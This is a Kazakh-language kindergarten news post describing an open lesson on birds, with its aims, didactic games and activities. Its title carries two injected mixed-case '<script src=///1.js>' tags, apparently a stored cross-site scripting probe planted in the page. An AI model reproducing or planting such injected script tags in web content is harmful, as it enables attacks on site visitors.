ІІ ортаңғы «Көбелек» тобында «Таным» саласы бойынша «Жаратылыстану» бөлімінде «Құстар» тақырыбында ашық ұйымдастырылған оқу қызметі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

08.12.2021

ІІ ортаңғы «Көбелек» тобында тәрбиеші Каскырбаева Жулдыз Жугериевнаның жетекшілігімен «Таным» саласы бойынша «Жаратылыстану» бөлімінде «Құстар» тақырыбында ашық ұйымдастырылған оқу қызметі өткізілді. Ұйымдастырылған оқу қызметінің мақсаттары:

Білімділік: балалардың құстар туралы түсінігін кеңейту, сөздік қорын байыту, байланыстырып сөйлеуге үйрету.

Дамытушылық: балалардың ойлау қабілетін дамыту, тақпақтар, мақал–мәтелдер, тыйым сөздер  айтқыза отырып, тілдерін дамыту.

Тәрбиелік: балаларды адамгершілікке, табиғатты сүюге, табиғатқа қамқор бола білуге тәрбиелеу.
Ұйымдастырылған оқу қызметінде мынадай әдіс-тәсілдер  көрсету, түсіндіру, сұрақ–жауап, 4 к модулімен жұмыстар қоланылды.

Дидактикалық ойын: «Сөйлемді аяқта»  құрылымдалған ойыны ойнатылды.   

Шарты: педагог сөйлемнің басын бастайды, балалар аяқтайды.

- Құстар ұша алады, өйткені ...

- Оның қанаты бар.

Дидактикалық ойын: «Ұшады ұшпайды» ойыны ойнатылды.

(шарты: берілген карточкадағы ұшатын құстармен ұшпайтын құстарды жеке жеке орналастыру керек)

Таңғажайып сәт:

(Қолында рогаткасы бар)  Амир кіреді.

Амирға құстар туралы балалар алдын ала жаттаған тақпақтарын айтып берді.

Балалар тақпақтарын айтады.

Дидактикалық ойын: «Үй құсы ма?, дала құсы ма?» ойыны

Шарты: берілген құстарды екі бөлек салып орналастырады.

Сергіту сәті тақырыпқа байланысты алынды.

Балалар пазылды құрастырып шығады.

Балалар оқу қызметі өздеріне ұнағанын айтты.

Просмотров: 272


Пікір қосу



Деректерді қолтаңбаға қосу